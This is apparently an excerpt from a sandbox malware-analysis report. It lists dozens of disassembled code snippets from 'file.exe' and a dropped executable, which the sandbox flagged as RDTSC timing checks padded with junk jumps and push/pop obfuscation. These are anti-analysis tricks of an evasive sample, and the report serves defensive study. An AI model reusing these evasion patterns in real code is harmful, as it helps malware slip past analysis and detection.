Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DA94C second address: 8DA95C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DAADC second address: 8DAAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DAC35 second address: 8DAC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DAC3A second address: 8DAC40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DC65D second address: 8DC663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DC663 second address: 8DC688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF40CBDB932h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FF40CBDB926h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DC688 second address: 8DC6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B064h 0x00000007 jc 00007FF40C70B056h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DC6A6 second address: 8DC6AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E0885 second address: 8E0889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E0889 second address: 8E088F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E088F second address: 8E08A6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF40C70B056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FF40C70B076h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1E7A second address: 8E1E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1E80 second address: 8E1E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FF40C70B05Eh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3868 second address: 8E387C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF40CBDB926h 0x0000000a jbe 00007FF40CBDB926h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E387C second address: 8E3887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF40C70B056h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F702FE second address: 4F70302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70302 second address: 4F70313 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70313 second address: 4F7034A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF40CBDB92Eh 0x0000000f push eax 0x00000010 jmp 00007FF40CBDB92Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7034A second address: 4F70365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70365 second address: 4F7037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF40CBDB934h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7037D second address: 4F7039D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF40C70B063h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F49C0 second address: 7F49E6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF40CBDB932h 0x00000008 jmp 00007FF40CBDB92Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF40CBDB92Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7043B second address: 4F70458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70458 second address: 4F7045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7045E second address: 4F70464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70464 second address: 4F70468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F704FE second address: 4F705B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d call 00007FF40C70B05Ch 0x00000012 pushfd 0x00000013 jmp 00007FF40C70B062h 0x00000018 jmp 00007FF40C70B065h 0x0000001d popfd 0x0000001e pop eax 0x0000001f mov ecx, edi 0x00000021 popad 0x00000022 mov esi, edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FF40C70B064h 0x0000002d add esi, 5CB4C8F8h 0x00000033 jmp 00007FF40C70B05Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007FF40C70B068h 0x0000003f and ecx, 7F882358h 0x00000045 jmp 00007FF40C70B05Bh 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F705B0 second address: 4F7062C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edx] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF40CBDB938h 0x00000012 sub ecx, 7F3CE818h 0x00000018 jmp 00007FF40CBDB92Bh 0x0000001d popfd 0x0000001e popad 0x0000001f inc edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FF40CBDB92Bh 0x00000029 add ch, FFFFFFDEh 0x0000002c jmp 00007FF40CBDB939h 0x00000031 popfd 0x00000032 mov ebx, esi 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7062C second address: 4F70658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test al, al 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FF40C70B05Ah 0x00000014 jmp 00007FF40C70B062h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70658 second address: 4F7062C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF40CBDB886h 0x0000000f mov al, byte ptr [edx] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF40CBDB938h 0x00000018 sub ecx, 7F3CE818h 0x0000001e jmp 00007FF40CBDB92Bh 0x00000023 popfd 0x00000024 popad 0x00000025 inc edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FF40CBDB92Bh 0x0000002f add ch, FFFFFFDEh 0x00000032 jmp 00007FF40CBDB939h 0x00000037 popfd 0x00000038 mov ebx, esi 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F707BC second address: 4F707C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F707C0 second address: 4F707C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F707C6 second address: 4F707CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F707CC second address: 4F707DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, byte ptr [edi+01h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F707DD second address: 4F707E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F707E1 second address: 4F707FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F707FE second address: 4F70849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF40C70B05Ch 0x00000011 or al, 00000058h 0x00000014 jmp 00007FF40C70B05Bh 0x00000019 popfd 0x0000001a mov dl, ah 0x0000001c popad 0x0000001d test al, al 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007FF40C70B05Ch 0x00000027 pop esi 0x00000028 mov ch, bl 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70849 second address: 4F7084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7084F second address: 4F70853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70853 second address: 4F708F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF47D1D3B4Ah 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 pushfd 0x00000013 jmp 00007FF40CBDB92Ah 0x00000018 add esi, 25060E18h 0x0000001e jmp 00007FF40CBDB92Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ecx, edx 0x00000027 jmp 00007FF40CBDB936h 0x0000002c shr ecx, 02h 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FF40CBDB92Dh 0x00000036 and ax, 7266h 0x0000003b jmp 00007FF40CBDB931h 0x00000040 popfd 0x00000041 popad 0x00000042 rep movsd 0x00000044 rep movsd 0x00000046 rep movsd 0x00000048 rep movsd 0x0000004a rep movsd 0x0000004c jmp 00007FF40CBDB92Eh 0x00000051 mov ecx, edx 0x00000053 jmp 00007FF40CBDB930h 0x00000058 and ecx, 03h 0x0000005b pushad 0x0000005c mov al, 8Dh 0x0000005e push eax 0x0000005f push edx 0x00000060 mov esi, ebx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F708F1 second address: 4F7092A instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 4E628468h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a rep movsb 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF40C70B068h 0x00000015 adc ah, FFFFFFC8h 0x00000018 jmp 00007FF40C70B05Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7092A second address: 4F7092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7092F second address: 4F7096F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ax, 0B4Bh 0x00000018 pushfd 0x00000019 jmp 00007FF40C70B060h 0x0000001e jmp 00007FF40C70B065h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7096F second address: 4F709A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF40CBDB938h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F709A2 second address: 4F709A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F709A6 second address: 4F709AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F709AC second address: 4F709DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF40C70B067h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F709DA second address: 4F709DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F709DF second address: 4F709F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, dl 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F709F5 second address: 4F709F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F709F9 second address: 4F709FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F709FD second address: 4F70A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70A03 second address: 4F70A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70A08 second address: 4F70A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF40CBDB92Ch 0x0000000a jmp 00007FF40CBDB935h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bx, 154Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70A3C second address: 4F70A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70A41 second address: 4F70A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70A4E second address: 4F70A60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70A60 second address: 4F70B0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF40CBDB931h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FF40CBDB931h 0x0000000f sbb al, FFFFFFE6h 0x00000012 jmp 00007FF40CBDB931h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop esi 0x0000001c pushad 0x0000001d call 00007FF40CBDB92Ch 0x00000022 pushfd 0x00000023 jmp 00007FF40CBDB932h 0x00000028 and ecx, 308479B8h 0x0000002e jmp 00007FF40CBDB92Bh 0x00000033 popfd 0x00000034 pop ecx 0x00000035 pushfd 0x00000036 jmp 00007FF40CBDB939h 0x0000003b adc esi, 038EE456h 0x00000041 jmp 00007FF40CBDB931h 0x00000046 popfd 0x00000047 popad 0x00000048 pop ebx 0x00000049 pushad 0x0000004a mov si, DB63h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70B0E second address: 4F704FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B065h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a leave 0x0000000b jmp 00007FF40C70B05Eh 0x00000010 retn 0008h 0x00000013 cmp dword ptr [ebp-2Ch], 10h 0x00000017 mov eax, dword ptr [ebp-40h] 0x0000001a jnc 00007FF40C70B055h 0x0000001c push eax 0x0000001d lea edx, dword ptr [ebp-00000590h] 0x00000023 push edx 0x00000024 call esi 0x00000026 push 00000008h 0x00000028 jmp 00007FF40C70B060h 0x0000002d push 38036323h 0x00000032 jmp 00007FF40C70B061h 0x00000037 xor dword ptr [esp], 4D5D7F0Bh 0x0000003e jmp 00007FF40C70B05Eh 0x00000043 call 00007FF47CD0EB7Ch 0x00000048 push 755727D0h 0x0000004d push dword ptr fs:[00000000h] 0x00000054 mov eax, dword ptr [esp+10h] 0x00000058 mov dword ptr [esp+10h], ebp 0x0000005c lea ebp, dword ptr [esp+10h] 0x00000060 sub esp, eax 0x00000062 push ebx 0x00000063 push esi 0x00000064 push edi 0x00000065 mov eax, dword ptr [75600140h] 0x0000006a xor dword ptr [ebp-04h], eax 0x0000006d xor eax, ebp 0x0000006f push eax 0x00000070 mov dword ptr [ebp-18h], esp 0x00000073 push dword ptr [ebp-08h] 0x00000076 mov eax, dword ptr [ebp-04h] 0x00000079 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000080 mov dword ptr [ebp-08h], eax 0x00000083 lea eax, dword ptr [ebp-10h] 0x00000086 mov dword ptr fs:[00000000h], eax 0x0000008c ret 0x0000008d jmp 00007FF40C70B060h 0x00000092 and dword ptr [ebp-04h], 00000000h 0x00000096 push eax 0x00000097 push edx 0x00000098 jmp 00007FF40C70B067h 0x0000009d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70C4E second address: 4F70C5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F70C5D second address: 4F70CD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF40C70B063h 0x00000013 jmp 00007FF40C70B063h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FF40C70B068h 0x0000001f sub si, 3AF8h 0x00000024 jmp 00007FF40C70B05Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: E5F305 second address: E5F30F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF40CBDB926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE8D81 second address: FE8D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE8D85 second address: FE8D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE8D89 second address: FE8D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE8D92 second address: FE8DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF40CBDB92Dh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE8DA4 second address: FE8DB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF40C70B05Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE7CD1 second address: FE7CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE7CD7 second address: FE7CE8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF40C70B056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE7CE8 second address: FE7D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF40CBDB92Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE7D01 second address: FE7D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE7D05 second address: FE7D28 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF40CBDB926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF40CBDB937h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE7D28 second address: FE7D2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE7E8B second address: FE7E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE800C second address: FE8011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE8011 second address: FE805F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF40CBDB934h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FF40CBDB938h 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnp 00007FF40CBDB926h 0x0000001f jmp 00007FF40CBDB92Dh 0x00000024 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FE805F second address: FE808F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF40C70B05Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FF40C70B056h 0x00000014 jmp 00007FF40C70B064h 0x00000019 rdtsc
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe RDTSC instruction interceptor: First address: FEA681 second address: FEA685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
